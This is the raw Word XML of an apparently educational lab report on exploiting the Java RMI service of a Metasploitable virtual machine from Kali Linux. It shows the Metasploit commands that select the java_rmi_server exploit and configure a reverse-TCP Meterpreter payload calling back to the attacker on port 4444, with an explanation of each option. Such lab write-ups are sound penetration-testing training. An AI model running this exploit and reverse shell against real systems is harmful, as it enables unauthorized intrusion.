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02012" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Java RMI Vulnerability Exploitation Report on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="453322BE" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="207FBDD0" w14:textId="77777777" w:rsidR="005937FA" w:rsidRDefault="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit the Java RMI vulnerability on a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine to establish a Meterpreter session and gather network configuration and routing table information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6375421B" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E5C80B" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Machine </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E385132" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Attacker Machine:</w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t> Kali Linux with IP 192.168.11.111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418FC71A" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Victim Machine:</w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> with IP 192.168.11.112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FFA1CC" w14:textId="77777777" w:rsidR="0069443B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="644826F6" wp14:editId="3F0B9863">
            <wp:extent cx="5731510" cy="1926590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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6B44" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Starting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2915EFEA" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Opened</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal in Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A1ABA4" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Launched Metasploit console with command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B62D32" w14:textId="31D594E5" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F2F8F0" w14:textId="77777777" w:rsidR="0069443B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AE1F2D2" wp14:editId="174A2183">
            <wp:extent cx="4108450" cy="2691532"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Immagine3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3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26" cy="269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D8D8" w14:textId="77777777" w:rsidR="0069443B" w:rsidRDefault="0069443B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DA0DE0" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit Configuration and Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC955FC" w14:textId="77777777" w:rsidR="0069443B" w:rsidRPr="005937FA" w:rsidRDefault="0069443B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32425350" w14:textId="42EA58B4" w:rsidR="005937FA" w:rsidRDefault="005937FA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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Selection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38F0FD38" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:t>Used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3E283C" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:r w:rsidRPr="005937FA">
        <w:t>use exploit/multi/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:t>java_rmi_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B58A5B3" w14:textId="77777777" w:rsidR="0069443B" w:rsidRDefault="0069443B"/>
    <w:p w14:paraId="22D995C7" w14:textId="77777777" w:rsidR="0069443B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Configurazione del Modulo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DCFCB5" w14:textId="74FF6BC0" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Set target and exploit options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E43726" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>set RHOST 192.168.11.112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052462FB" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>set RPORT 1099</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF5F72C" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>set PAYLOAD java/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A183177" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>set LHOST 192.168.11.111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2EA44F" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752BB9FC" w14:textId="51622AC3" w:rsidR="0069443B" w:rsidRPr="005937FA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2477718C" wp14:editId="154BC06F">
            <wp:extent cx="5731510" cy="4543425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Immagine4" descr="Immagine che contiene testo, schermata, menu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4" descr="Immagine che contiene testo, schermata, menu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7FA">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298AEB0A" w14:textId="77777777" w:rsidR="0069443B" w:rsidRPr="005937FA" w:rsidRDefault="0069443B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5167A716" w14:textId="77777777" w:rsidR="0069443B" w:rsidRPr="005937FA" w:rsidRDefault="0069443B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1081E9A3" w14:textId="77777777" w:rsidR="0069443B" w:rsidRPr="005937FA" w:rsidRDefault="0069443B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCB620E" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Configuration Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F3138B" w14:textId="77777777" w:rsidR="005937FA" w:rsidRDefault="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RHOST: </w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Target server IP (192.168.11.112)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73176AE0" w14:textId="49A6D174" w:rsidR="0069443B" w:rsidRPr="005937FA" w:rsidRDefault="005937FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>RPORT:</w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Target port (1099 for Java RMI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2B324" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>PAYLOAD:</w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Java Meterpreter reverse TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE53861" w14:textId="475471E8" w:rsidR="0069443B" w:rsidRPr="005937FA" w:rsidRDefault="005937FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>LHOST:</w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Attacker IP for reverse connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B0AFEA" w14:textId="443E2745" w:rsidR="0069443B" w:rsidRPr="005937FA" w:rsidRDefault="005937FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>LPORT: </w:t>
      </w:r>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Attacker listening port (4444)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35597335" w14:textId="77777777" w:rsidR="0069443B" w:rsidRPr="005937FA" w:rsidRDefault="0069443B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D9D4C7" w14:textId="066E742F" w:rsidR="0069443B" w:rsidRDefault="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>These settings prepare the exploit to target the Java server at 192.168.11.112:1099, with a Java-based Meterpreter payload that connects back to our machine (192.168.11.111:4444).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504A29C6" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Verified</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> settings with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFC6875" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA" w:rsidP="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005937FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0599CFFA" w14:textId="77777777" w:rsidR="005937FA" w:rsidRPr="005937FA" w:rsidRDefault="005937FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
